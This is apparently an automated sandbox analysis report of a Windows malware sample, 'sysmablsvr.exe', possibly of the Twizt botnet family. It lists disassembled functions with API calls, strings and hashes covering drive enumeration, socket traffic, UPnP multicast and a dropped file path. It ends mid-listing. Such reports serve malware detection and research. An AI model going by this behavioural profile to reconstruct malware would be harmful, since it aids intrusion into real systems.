                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                              • String ID: C:\Users\user\tbtnds.dat
                                              • API String ID: 442028454-3213863656
                                              • Opcode ID: 28d45dda015037e92cc0aa9728b693d27f468723c49624775dc4f20b05194a44
                                              • Instruction ID: c603907199676edbd5c7d0fa982afae34b74f891853afe3642d2180ffa8dca70
                                              • Opcode Fuzzy Hash: 28d45dda015037e92cc0aa9728b693d27f468723c49624775dc4f20b05194a44
                                              • Instruction Fuzzy Hash: 8D313EB4A40209EBCB14DF94EC85FAEB7B4FB48300F20C569E515673D0D774AA41DB99
                                              Function 004073B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep$CacheDeleteEntrywsprintf
                                              • String ID: %s%s
                                              • API String ID: 1447977647-3252725368
                                              • Opcode ID: 2a5e0a3edf9c78aeac98a41108ab1fe6791137a0a25f1b9013466a3a7acc76ac
                                              • Instruction ID: 945b1e68ff25bd35ce4625b60af53a64f9c21a9b46b3aa14aa85a39d9b5f9782
                                              • Opcode Fuzzy Hash: 2a5e0a3edf9c78aeac98a41108ab1fe6791137a0a25f1b9013466a3a7acc76ac
                                              • Instruction Fuzzy Hash: 5D310DB4C00218EFCB50DF95DC88BEDBBB4FB48304F1085AAE609B6290D7795A84CF59
                                              Function 00406340 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLogicalDrives.KERNEL32 ref: 00406346
                                              • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                              • RegQueryValueExW.KERNEL32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                              • RegCloseKey.ADVAPI32(?), ref: 004063DE
                                              Strings
                                              • NoDrives, xrefs: 004063B8
                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406387
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseDrivesLogicalOpenQueryValue
                                              • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                              • API String ID: 2666887985-3471754645
                                              • Opcode ID: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
                                              • Instruction ID: 85ff322c7a95afac5eb7bad71570108e7de378f82f6edd769b1cbb34207a952c
                                              • Opcode Fuzzy Hash: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
                                              • Instruction Fuzzy Hash: 7F11D071E40209DBDB10CFD0D946BEEBBB4FB08704F108159E915B7280D7B8A655CF95
                                              Function 0040D6F0 Relevance: 9.1, APIs: 6, Instructions: 80threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D714
                                                • Part of subcall function 0040D7E0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D820
                                                • Part of subcall function 0040D7E0: CloseHandle.KERNEL32(?), ref: 0040D839
                                              • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D76F
                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D7AC
                                              • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D7B7
                                              • DuplicateHandle.KERNEL32(00000000), ref: 0040D7BE
                                              • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D7D2
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                              • String ID:
                                              • API String ID: 2251373460-0
                                              • Opcode ID: 79fa7f5129bcfcfc5e35f54f723da72931e91f9957c0ae906c73dd34cb907117
                                              • Instruction ID: 832ae4800ebcb00f90e7428fbbdd4da527039cf188cbed956f615c5464689476
                                              • Opcode Fuzzy Hash: 79fa7f5129bcfcfc5e35f54f723da72931e91f9957c0ae906c73dd34cb907117
                                              • Instruction Fuzzy Hash: 2C31F874A00208EFDB04DF94D889F9EBBB5FB49304F0085A9E905A7390D775AA95CF54
                                              Function 00401200 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                              • htons.WS2_32(?), ref: 00401281
                                              • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExchangeInterlockedhtonsmemcpysendto
                                              • String ID: pdu
                                              • API String ID: 2164660128-2320407122
                                              • Opcode ID: 6fa5c5ff501d056adbb62469864e836e9e141a6fe1f3d9c4b2298fbd3bb4f107
                                              • Instruction ID: 395797021da18ac5dc0c4ab187d218299f1ec32cbdde21a351b7e81b9c40248d
                                              • Opcode Fuzzy Hash: 6fa5c5ff501d056adbb62469864e836e9e141a6fe1f3d9c4b2298fbd3bb4f107
                                              • Instruction Fuzzy Hash: E83180762083009BC710DF69D884A9BBBF4AFC9714F04456EFD9897381D634D91587AB
                                              Function 00406F70 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 22memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CoInitializeEx.OLE32(00000000,00000002,?,?,00407FB7), ref: 00406F78
                                              • SysAllocString.OLEAUT32(C:\Windows\sysmablsvr.exe), ref: 00406F83
                                              • CoUninitialize.OLE32 ref: 00406FA8
                                                • Part of subcall function 00406FC0: SysFreeString.OLEAUT32(00000000), ref: 004071D8
                                              • SysFreeString.OLEAUT32(00000000), ref: 00406FA2
                                              Strings
                                              • C:\Windows\sysmablsvr.exe, xrefs: 00406F7E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: String$Free$AllocInitializeUninitialize
                                              • String ID: C:\Windows\sysmablsvr.exe
                                              • API String ID: 459949847-366549503
                                              • Opcode ID: 04d1d2bcffda370cb2b5a7ceb5013a9587be47d2db71fc951fd56c3c7d876cd0
                                              • Instruction ID: 7397cee9579370c29f446d7a93da1be4fc5365a48f81cc5ba3db23e82f7acdfe
                                              • Opcode Fuzzy Hash: 04d1d2bcffda370cb2b5a7ceb5013a9587be47d2db71fc951fd56c3c7d876cd0
                                              • Instruction Fuzzy Hash: 22E0D8B4940308FBCB00DBE0ED0EB8D7734EB04315F004074F90267291DAB95E80C755
                                              Function 004062C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDriveTypeW.KERNEL32(0040629F), ref: 004062CD
                                              • QueryDosDeviceW.KERNEL32(0040629F,?,00000208), ref: 0040630C
                                              • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406324
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeviceDriveQueryType
                                              • String ID: \??\
                                              • API String ID: 1681518211-3047946824
                                              • Opcode ID: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
                                              • Instruction ID: fe1cba3e8f96ca8ec28924db8accccc61f2e919e988f9d14e04ecf4ac666ff3a
                                              • Opcode Fuzzy Hash: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
                                              • Instruction Fuzzy Hash: 1901FFB0A4021CEBCB20DF55DD49BDAB7B4AB04704F00C0BAAA05A7280E6759ED5DF9C
                                              Function 00401100 Relevance: 6.1, APIs: 4, Instructions: 86synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ioctlsocket.WS2_32 ref: 0040112B
                                              • recvfrom.WS2_32 ref: 0040119C
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                              • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                              • String ID:
                                              • API String ID: 3980219359-0
                                              • Opcode ID: 9fd04ca368f2f0733dbd00e11fcdc64336c0dc17fc499274760987b24178d786
                                              • Instruction ID: e1b7ef358c802af59afb00f280b99e3e8e19274dac2adc7c4e0c886c1a13037e
                                              • Opcode Fuzzy Hash: 9fd04ca368f2f0733dbd00e11fcdc64336c0dc17fc499274760987b24178d786
                                              • Instruction Fuzzy Hash: 1521C3B1504301AFD304DF65DC84A6BB7E9EF88314F004A3EF555A62A0E774DD488BEA
                                              Function 00406FC0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00407250: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407270
                                              • SysFreeString.OLEAUT32(00000000), ref: 004071D8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFreeInstanceString
                                              • String ID: Microsoft Corporation
                                              • API String ID: 586785272-3838278685
                                              • Opcode ID: 47348544a12607a113ad889ec3bd29dddf14831e53aa8f734b6601f1a55deb08
                                              • Instruction ID: e6ff3ca51e6e637cb53d631dd4329f9e07d4b07e7a8aed38044ad589faa32fb5
                                              • Opcode Fuzzy Hash: 47348544a12607a113ad889ec3bd29dddf14831e53aa8f734b6601f1a55deb08
                                              • Instruction Fuzzy Hash: 0F91EC75A0410ADFCB04DF98C894AAFB3B5BF89304F208169E515BB3E0D774AD41CBA6
                                              Function 0040DBD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON
                                              Download Yara Rule
                                              APIs
                                              • CoInitializeEx.COMBASE(00000000,00000002,?,?,?,00407FB2), ref: 0040DBDA
                                                • Part of subcall function 0040DCA0: socket.WS2_32(00000002,00000002,00000011), ref: 0040DCBA
                                                • Part of subcall function 0040DCA0: htons.WS2_32(0000076C), ref: 0040DCF0
                                                • Part of subcall function 0040DCA0: inet_addr.WS2_32(239.255.255.250), ref: 0040DCFF
                                                • Part of subcall function 0040DCA0: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040DD1D
                                                • Part of subcall function 0040DCA0: bind.WS2_32(000000FF,?,00000010), ref: 0040DD53
                                                • Part of subcall function 0040DCA0: lstrlenA.KERNEL32(00411D70,00000000,?,00000010), ref: 0040DD6C
                                                • Part of subcall function 0040DCA0: sendto.WS2_32(000000FF,00411D70,00000000), ref: 0040DD7B
                                                • Part of subcall function 0040DCA0: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DD95
                                                • Part of subcall function 0040DF10: SysFreeString.OLEAUT32(00000000), ref: 0040DFEB
                                                • Part of subcall function 0040DF10: SysFreeString.OLEAUT32(00000000), ref: 0040DFF5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                              • String ID: TCP$UDP
                                              • API String ID: 1519345861-1097902612
                                              • Opcode ID: eec8d27479aca65ce9d536c40e716b47b94f3bf0f210a133f1cac4c1684116a5
                                              • Instruction ID: a00cbb5bcfca6c5959655f637b3ec774768ac2685424fa301eff230043eb3e38
                                              • Opcode Fuzzy Hash: eec8d27479aca65ce9d536c40e716b47b94f3bf0f210a133f1cac4c1684116a5
                                              • Instruction Fuzzy Hash: A011B4B4D04208EBEB00EBD4DD85FAE7774EB44308F14886EE511772C2D6B86A54DB59
                                              Function 0040D060 Relevance: 4.6, APIs: 3, Instructions: 120COMMON
                                              Download Yara Rule
                                              APIs
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040D06C
                                              • InterlockedIncrement.KERNEL32(000000FF), ref: 0040D0A1
                                              • InterlockedDecrement.KERNEL32(000000FF), ref: 0040D1A4
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Interlocked$DecrementExchangeIncrement
                                              • String ID:
                                              • API String ID: 2813130747-0
                                              • Opcode ID: 10f46782638f7eda3a214a1f10b58e6aed05a65f91f94cb894a7507c1a205cdc
                                              • Instruction ID: 017c2f15931ef08fbe7839c337ff8a6f36f60e541ef5a040d0e28dc2d006860e
                                              • Opcode Fuzzy Hash: 10f46782638f7eda3a214a1f10b58e6aed05a65f91f94cb894a7507c1a205cdc
                                              • Instruction Fuzzy Hash: 0F41C4B5E00204BBDB00EAE4DC45BAFB774AF44304F14856DF5057B2C2EA39E549C7AA
                                              Function 0040BA10 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 53stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrlenA.KERNEL32(Twizt,0040D0C6,0040D0C6,?,?,0040D0C6,000000FF,0040D0C6,0040D0C6,000000FF,00000000), ref: 0040BA5C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrlen
                                              • String ID: Twizt$Twizt
                                              • API String ID: 1659193697-16428492
                                              • Opcode ID: fa8edf28750f8027af871247a63973c4b41ab5b5d4de526fdf23350eaac8532b
                                              • Instruction ID: 4e54a8859baccdb28b1a2df46ebdf2c08f14bf9243dcc10692db5268a496b862
                                              • Opcode Fuzzy Hash: fa8edf28750f8027af871247a63973c4b41ab5b5d4de526fdf23350eaac8532b
                                              • Instruction Fuzzy Hash: 0E111FB5900108BFCB04DF98D845E9EB7B5EF48304F14C1A9FD19AB342D635EA51CBA6
                                              Function 0040D350 Relevance: 4.5, APIs: 3, Instructions: 45networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • socket.WS2_32(00000002,00000001,00000006), ref: 0040D363
                                              • htons.WS2_32(00009E34), ref: 0040D395
                                              • connect.WS2_32(000000FF,?,00000010), ref: 0040D3AF
                                                • Part of subcall function 0040B0D0: shutdown.WS2_32(0040B0BD,00000002), ref: 0040B0D9
                                                • Part of subcall function 0040B0D0: closesocket.WS2_32(0040B0BD), ref: 0040B0E3
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: closesocketconnecthtonsshutdownsocket
                                              • String ID:
                                              • API String ID: 1987800339-0
                                              • Opcode ID: ad00b5e66e502cf51556e2fe0723fe5a46734f1a748e3451fb2f35000b259efe
                                              • Instruction ID: ee266e0a8c8719bc2fba7400efab20befeff5f99746ae5463c0b1e7a65fd0daa
                                              • Opcode Fuzzy Hash: ad00b5e66e502cf51556e2fe0723fe5a46734f1a748e3451fb2f35000b259efe
                                              • Instruction Fuzzy Hash: 72115E74D15209EBCB10DFE4D9096AEB770AF08320F2042A9E825A73D0E7744F04D75A
                                              Function 0040A400 Relevance: 4.5, APIs: 3, Instructions: 34memoryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0040A3E0: GetCurrentProcessId.KERNEL32(?,0040A34B,?,0040CC5E,00000010,?,?,?,?,?,?,0040C9CB), ref: 0040A3E3
                                              • HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,0040A357,?,0040CC5E,00000010,?,?,?,?,?,?,0040C9CB), ref: 0040A42C
                                              • HeapSetInformation.KERNEL32(00520000,00000000,00000002,00000004), ref: 0040A456
                                              • GetCurrentProcessId.KERNEL32 ref: 0040A45C
                                                • Part of subcall function 0040A470: GetProcessHeaps.KERNEL32(000000FF,?), ref: 0040A48C
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CurrentHeap$CreateHeapsInformation
                                              • String ID:
                                              • API String ID: 3179415709-0
                                              • Opcode ID: 5a108914b3ca16dd467672ecd1f535595cbdc9e5ef981947958d13e496554fa7
                                              • Instruction ID: edbbffaf93a3436984b23127d7402b1a87aa4c07fde6db6b10934f01e370cb92
                                              • Opcode Fuzzy Hash: 5a108914b3ca16dd467672ecd1f535595cbdc9e5ef981947958d13e496554fa7
                                              • Instruction Fuzzy Hash: AFF0B4B4594304ABD324EB61FD49FA73674A704309F10C03AF6059A2D0EAB99854CBAE
                                              Function 0040ED00 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(00406B80,80000000,00000001,00000000,00000003,00000000,00000000,00406B80), ref: 0040ED20
                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040ED35
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040ED42
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleSize
                                              • String ID:
                                              • API String ID: 1378416451-0
                                              • Opcode ID: df23a932ebc1e553a736a6907ae04855c01650ef694a25ef55576e6386c5cc64
                                              • Instruction ID: 98ef07a2b566d3243162703a825906d5a5daebce6a0da163f7da7fd81d96dea2
                                              • Opcode Fuzzy Hash: df23a932ebc1e553a736a6907ae04855c01650ef694a25ef55576e6386c5cc64
                                              • Instruction Fuzzy Hash: 59F01C78A40308FBDB20DFA4DC49B8DBBB4EB04701F208295FA04BB2D0D6B56A908B44
                                              Function 0040A340 Relevance: 3.1, APIs: 2, Instructions: 52memoryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0040A3E0: GetCurrentProcessId.KERNEL32(?,0040A34B,?,0040CC5E,00000010,?,?,?,?,?,?,0040C9CB), ref: 0040A3E3
                                              • RtlAllocateHeap.NTDLL(00520000,?,-0000000C), ref: 0040A38A
                                              • memset.NTDLL ref: 0040A3C4
                                                • Part of subcall function 0040A400: HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,0040A357,?,0040CC5E,00000010,?,?,?,?,?,?,0040C9CB), ref: 0040A42C
                                                • Part of subcall function 0040A400: HeapSetInformation.KERNEL32(00520000,00000000,00000002,00000004), ref: 0040A456
                                                • Part of subcall function 0040A400: GetCurrentProcessId.KERNEL32 ref: 0040A45C
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$CurrentProcess$AllocateCreateInformationmemset
                                              • String ID:
                                              • API String ID: 3494217179-0
                                              • Opcode ID: ff151d06aee4f1c47090b8446ec3a31afed0510a3b2c283af0ac3e03788a053e
                                              • Instruction ID: dafe32efe4c167221a9f0a0fcc4700d2ff8859eb3bfe14518bdee6820b90f2e1
                                              • Opcode Fuzzy Hash: ff151d06aee4f1c47090b8446ec3a31afed0510a3b2c283af0ac3e03788a053e
                                              • Instruction Fuzzy Hash: DB111675D00208BBCB14DFA5DC45F9E7BB4AF44308F14C169F908A7381D6799A64CB99
                                              Function 0040DAE0 Relevance: 3.0, APIs: 2, Instructions: 49synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 004013B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DAED,00000000), ref: 004013D5
                                                • Part of subcall function 004013B0: socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
